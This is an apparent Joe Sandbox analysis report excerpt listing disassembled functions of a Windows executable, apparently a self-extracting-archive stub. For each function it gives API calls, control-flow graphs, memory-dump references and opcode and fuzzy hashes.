                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchPeekTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1266772231-0
                                                                                              • Opcode ID: 256009d0a90864d79b9a2e57ae91c5747e7010ed80b2777cdffb5376fca23bd2
                                                                                              • Instruction ID: b62e6434f76fc4371c9c2f6f128c68de62d8f72c61acd1f3c3404739fa6fe97a
                                                                                              • Opcode Fuzzy Hash: 256009d0a90864d79b9a2e57ae91c5747e7010ed80b2777cdffb5376fca23bd2
                                                                                              • Instruction Fuzzy Hash: 05F0F972902329EBDB209BA19C4CEEF7F6CEF062527404415F405D2580EB749445C7B1
                                                                                              Function 0010A2C7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1003 10a2c7-10a2e6 GetClassNameW 1004 10a2e8-10a2fd call 1017ac 1003->1004 1005 10a30e-10a310 1003->1005 1010 10a30d 1004->1010 1011 10a2ff-10a30b FindWindowExW 1004->1011 1007 10a312-10a315 SHAutoComplete 1005->1007 1008 10a31b-10a31f 1005->1008 1007->1008 1010->1005 1011->1010
                                                                                              APIs
                                                                                              • GetClassNameW.USER32(?,?,00000050), ref: 0010A2DE
                                                                                              • SHAutoComplete.SHLWAPI(?,00000010), ref: 0010A315
                                                                                                • Part of subcall function 001017AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,000FBB05,00000000,.exe,?,?,00000800,?,?,001085DF,?), ref: 001017C2
                                                                                              • FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 0010A305
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AutoClassCompareCompleteFindNameStringWindow
                                                                                              • String ID: EDIT
                                                                                              • API String ID: 4243998846-3080729518
                                                                                              • Opcode ID: 947d9867b10eed838f0ad99b9c0d15ec794532b5b36ec036e10614f82b39c8d3
                                                                                              • Instruction ID: e62d3a178ac84540ee914f39ecd7376e03076e1d09be279b01a9c7fa9a4b9792
                                                                                              • Opcode Fuzzy Hash: 947d9867b10eed838f0ad99b9c0d15ec794532b5b36ec036e10614f82b39c8d3
                                                                                              • Instruction Fuzzy Hash: ADF08233A42328BBE72096649C05FAB776CAF46B11F440056FD45AA1C0D7B0A991C6F6
                                                                                              Function 0010D287 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1012 10d287-10d2b2 call 10e360 SetEnvironmentVariableW call ffbd8 1016 10d2b7-10d2bb 1012->1016 1017 10d2bd-10d2c1 1016->1017 1018 10d2df-10d2e3 1016->1018 1019 10d2ca-10d2d1 call ffcf1 1017->1019 1022 10d2c3-10d2c9 1019->1022 1023 10d2d3-10d2d9 SetEnvironmentVariableW 1019->1023 1022->1019 1023->1018
                                                                                              APIs
                                                                                              • SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0010D29D
                                                                                              • SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0010D2D9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: EnvironmentVariable
                                                                                              • String ID: sfxcmd$sfxpar
                                                                                              • API String ID: 1431749950-3493335439
                                                                                              • Opcode ID: 978028dce7ec9b91c0435ca48f3583145c3313b79749428882204b14e55ea11e
                                                                                              • Instruction ID: dc75fdc092424f593dc730c492071e457a2b749ca2cb724204041bf8f4a695ed
                                                                                              • Opcode Fuzzy Hash: 978028dce7ec9b91c0435ca48f3583145c3313b79749428882204b14e55ea11e
                                                                                              • Instruction Fuzzy Hash: ABF0A77180023CA6C7202FD0BC09AFA7B59AF19B41B044411FD8456181D7B4CD60D6F5
                                                                                              Function 000F984E Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1024 f984e-f985a 1025 f985c-f9864 GetStdHandle 1024->1025 1026 f9867-f987e ReadFile 1024->1026 1025->1026 1027 f98da 1026->1027 1028 f9880-f9889 call f9989 1026->1028 1029 f98dd-f98e2 1027->1029 1032 f988b-f9893 1028->1032 1033 f98a2-f98a6 1028->1033 1032->1033 1036 f9895 1032->1036 1034 f98a8-f98b1 GetLastError 1033->1034 1035 f98b7-f98bb 1033->1035 1034->1035 1037 f98b3-f98b5 1034->1037 1038 f98bd-f98c5 1035->1038 1039 f98d5-f98d8 1035->1039 1040 f9896-f98a0 call f984e 1036->1040 1037->1029 1038->1039 1041 f98c7-f98d0 GetLastError 1038->1041 1039->1029 1040->1029 1041->1039 1043 f98d2-f98d3 1041->1043 1043->1040
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 000F985E
                                                                                              • ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 000F9876
                                                                                              • GetLastError.KERNEL32 ref: 000F98A8
                                                                                              • GetLastError.KERNEL32 ref: 000F98C7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$FileHandleRead
                                                                                              • String ID:
                                                                                              • API String ID: 2244327787-0
                                                                                              • Opcode ID: c404021de34063fe2cf9a8c56e1fc29e182062da68399d89584acd93aa4ec52b
                                                                                              • Instruction ID: bb994b7bed3dedc8d60518261641db2da2b006e3b90dd763208ae8cea4bf80f5
                                                                                              • Opcode Fuzzy Hash: c404021de34063fe2cf9a8c56e1fc29e182062da68399d89584acd93aa4ec52b
                                                                                              • Instruction Fuzzy Hash: 62119E3090020CFBDB705A51C804BB977E8EB427B1F10812AFA2A85D90DF399E42BB51
                                                                                              Function 0011A4F4 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00113713,00000000,00000000,?,0011A49B,00113713,00000000,00000000,00000000,?,0011A698,00000006,FlsSetValue), ref: 0011A526
                                                                                              • GetLastError.KERNEL32(?,0011A49B,00113713,00000000,00000000,00000000,?,0011A698,00000006,FlsSetValue,00127348,00127350,00000000,00000364,?,00119077), ref: 0011A532
                                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0011A49B,00113713,00000000,00000000,00000000,?,0011A698,00000006,FlsSetValue,00127348,00127350,00000000), ref: 0011A540
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 3177248105-0
                                                                                              • Opcode ID: 71529825f3fb85da9e77ebcf2100213239ebd8c942b7b7f8225803f3f3e3e19a
                                                                                              • Instruction ID: e86b9fe477b0950466af1ccc1f5581fb1ca993bbd77af26398d410d1124f8cd6
                                                                                              • Opcode Fuzzy Hash: 71529825f3fb85da9e77ebcf2100213239ebd8c942b7b7f8225803f3f3e3e19a
                                                                                              • Instruction Fuzzy Hash: D1017B3271B222BBC7758B78AC44AA67F99AF01BA1B510230F90AD3140D734D991C6E1
                                                                                              Function 000F9F2F Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetStdHandle.KERNEL32(000000F5,?,00000001,?,?,000FCC94,00000001,?,?,?,00000000,00104ECD,?,?,?), ref: 000F9F4C
                                                                                              • WriteFile.KERNEL32(?,?,?,00000000,00000000,?,?,00000000,00104ECD,?,?,?,?,?,00104972,?), ref: 000F9F8E
                                                                                              • WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000001,?,?,000FCC94,00000001,?,?), ref: 000F9FB8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite$Handle
                                                                                              • String ID:
                                                                                              • API String ID: 4209713984-0
                                                                                              • Opcode ID: de4c41656eafd5212041d5e4c54340adbd7e19d88ffbda9f861e17559ed49677
                                                                                              • Instruction ID: ef47435ba766fd6dca228e25e42664ce19358155504f3ccec79c5819e501a8b6
                                                                                              • Opcode Fuzzy Hash: de4c41656eafd5212041d5e4c54340adbd7e19d88ffbda9f861e17559ed49677
                                                                                              • Instruction Fuzzy Hash: F33104712083099BDF208F14D948B7ABBE8EB41710F044528FA49DA981CB75D94DEBB2
                                                                                              Function 000FA207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA22E
                                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA261
                                                                                              • GetLastError.KERNEL32(?,?,?,?,000FA113,?,00000001,00000000,?,?), ref: 000FA27E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateDirectory$ErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 2485089472-0
                                                                                              • Opcode ID: 77171616e0f45a208430e748db7d078f59e1eea3a1cd3ff48dd5caf552bbe042
                                                                                              • Instruction ID: 1a2b3d4fa393bbe0fa8be905f9ff029bd19dba464b8434cf602e56c95a429ca4
                                                                                              • Opcode Fuzzy Hash: 77171616e0f45a208430e748db7d078f59e1eea3a1cd3ff48dd5caf552bbe042
                                                                                              • Instruction Fuzzy Hash: 3C0192B134021C66DFB29B688C45BFE3388AF0B741F044451FB49D5891D76ADA81B6B7
                                                                                              Function 0011AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0011B019
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Info
                                                                                              • String ID:
                                                                                              • API String ID: 1807457897-3916222277
                                                                                              • Opcode ID: 0e01c3a3b449348170f2dc0b86a648452b753b49bccb886e6e3497680546066a
                                                                                              • Instruction ID: 6ef97df3789f16111f98db12c733673a34cb3af10c81b152ee387f2dcd963d2f
                                                                                              • Opcode Fuzzy Hash: 0e01c3a3b449348170f2dc0b86a648452b753b49bccb886e6e3497680546066a
                                                                                              • Instruction Fuzzy Hash: 9741F67050838CAADF298A64CCD4AFBBBB9DB59304F1404FDE59A87142E3359A85DF60
                                                                                              Function 0011A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0011A79D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: String
                                                                                              • String ID: LCMapStringEx
                                                                                              • API String ID: 2568140703-3893581201
                                                                                              • Opcode ID: 836e9aef7c07736c4d4bd45c9cc7f5ce27cd6f896ab536204aeb925ac2996d24
                                                                                              • Instruction ID: 3aaa45f25f21e5b44d5f05dde594f7c5b06e40f83d7f1aa3fc69b80e2e3d0968
                                                                                              • Opcode Fuzzy Hash: 836e9aef7c07736c4d4bd45c9cc7f5ce27cd6f896ab536204aeb925ac2996d24
                                                                                              • Instruction Fuzzy Hash: B1011332541218BBCF1A9FA0DC01DEE7F66FF08720F444124FE14251A0CB768A71AB91
                                                                                              Function 0011A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00119D2F), ref: 0011A715
                                                                                              Strings
                                                                                              • InitializeCriticalSectionEx, xrefs: 0011A6E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CountCriticalInitializeSectionSpin
                                                                                              • String ID: InitializeCriticalSectionEx
                                                                                              • API String ID: 2593887523-3084827643
                                                                                              • Opcode ID: fa3a29cfa8949dd2a5f5568e21846fbb3a9c269db652f7da5b03be92d300f593
                                                                                              • Instruction ID: 1a9377447712fb68f7b744a5eca833f6b5abc8e25d876e4233e216f5d4b93d3e
                                                                                              • Opcode Fuzzy Hash: fa3a29cfa8949dd2a5f5568e21846fbb3a9c269db652f7da5b03be92d300f593
                                                                                              • Instruction Fuzzy Hash: 51F0E23164621CBBCB19AF60DC05CAE7FA1FF14B20B404064FC191A2A0DB725EB1EB91
                                                                                              Function 0011A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: Alloc
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2773662609-671089009
                                                                                              • Opcode ID: f425a51ccd42028c6a85dff1a3c987e9e4eb9c8963b334982f4931b51d02a31f
                                                                                              • Instruction ID: 90750a130a89ac2ecb4455afea890634c8727412f20b1bd173e844dfa4b1c711
                                                                                              • Opcode Fuzzy Hash: f425a51ccd42028c6a85dff1a3c987e9e4eb9c8963b334982f4931b51d02a31f
                                                                                              • Instruction Fuzzy Hash: FAE05C7074622C7FD324AB509C068AEBF92DF24710B410024FC0417280CF740E61AAD5
                                                                                              Function 0011329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • try_get_function.LIBVCRUNTIME ref: 001132AF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: try_get_function
                                                                                              • String ID: FlsAlloc
                                                                                              • API String ID: 2742660187-671089009
                                                                                              • Opcode ID: e652241081e2bb7e09b3a92112cc99eeed76f5e2165c166d0214817a2677aacd
                                                                                              • Instruction ID: 9fcf5e6ba1f91c72afca695e2ff5d65c2409a7b8847a38f50fa0acb539d2d703
                                                                                              • Opcode Fuzzy Hash: e652241081e2bb7e09b3a92112cc99eeed76f5e2165c166d0214817a2677aacd
                                                                                              • Instruction Fuzzy Hash: DBD02B71781A387AD61032C17C079EE7E468701FB1F450162FE081A182C7B145B001C5
                                                                                              Function 0010E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 0010E20B
                                                                                                • Part of subcall function 0010DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0010DFD6
                                                                                                • Part of subcall function 0010DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0010DFE7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID: 3Ro
                                                                                              • API String ID: 1269201914-1492261280
                                                                                              • Opcode ID: a6d3a971563c2ba40540379e1781053d36585b763fbf4993bf4ebb618ed8f973
                                                                                              • Instruction ID: 776c597fe80e6f49c3b5bb080b434496113db132277d1b9eafbddd1342310e85
                                                                                              • Opcode Fuzzy Hash: a6d3a971563c2ba40540379e1781053d36585b763fbf4993bf4ebb618ed8f973
                                                                                              • Instruction Fuzzy Hash: 5FB012B226F002FCB20C51417E06C3B031CC8D0B51331C41AFA55E80C1D7C04C0A4432
                                                                                              Function 0011B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                                • Part of subcall function 0011AF1B: GetOEMCP.KERNEL32(00000000,?,?,0011B1A5,?), ref: 0011AF46
                                                                                              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0011B1EA,?,00000000), ref: 0011B3C4
                                                                                              • GetCPInfo.KERNEL32(00000000,0011B1EA,?,?,?,0011B1EA,?,00000000), ref: 0011B3D7
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1662213761.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1662190174.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662251381.0000000000123000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.000000000012E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000134000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662273110.0000000000151000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1662344529.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_f0000_6uPVRnocVS.jbxd
                                                                                              Similarity
                                                                                              • API ID: CodeInfoPageValid
                                                                                              • String ID:
                                                                                              • API String ID: 546120528-0
                                                                                              • Opcode ID: f6d5ec5cd2465b6519d3b11884bd8cba25fc04561f56bd8142e896c36eadc7d9
                                                                                              • Instruction ID: 158b970ef9a496e85d35569d73613fe89fdddf64daf4ae0066f709b65a2dba19
                                                                                              • Opcode Fuzzy Hash: f6d5ec5cd2465b6519d3b11884bd8cba25fc04561f56bd8142e896c36eadc7d9
                                                                                              • Instruction Fuzzy Hash: AB5113B09082159EDB288F35C8C16FABBE5EF51310F18847ED0978AA52D7359586CB91
                                                                                              Function 000F1385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 000F1385
                                                                                                • Part of subcall function 000F6057: __EH_prolog.LIBCMT ref: 000F605C
                                                                                                • Part of subcall function 000FC827: __EH_prolog.LIBCMT ref: 000FC82C
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC86F
                                                                                                • Part of subcall function 000FC827: new.LIBCMT ref: 000FC893
                                                                                              • new.LIBCMT ref: 000F13FE
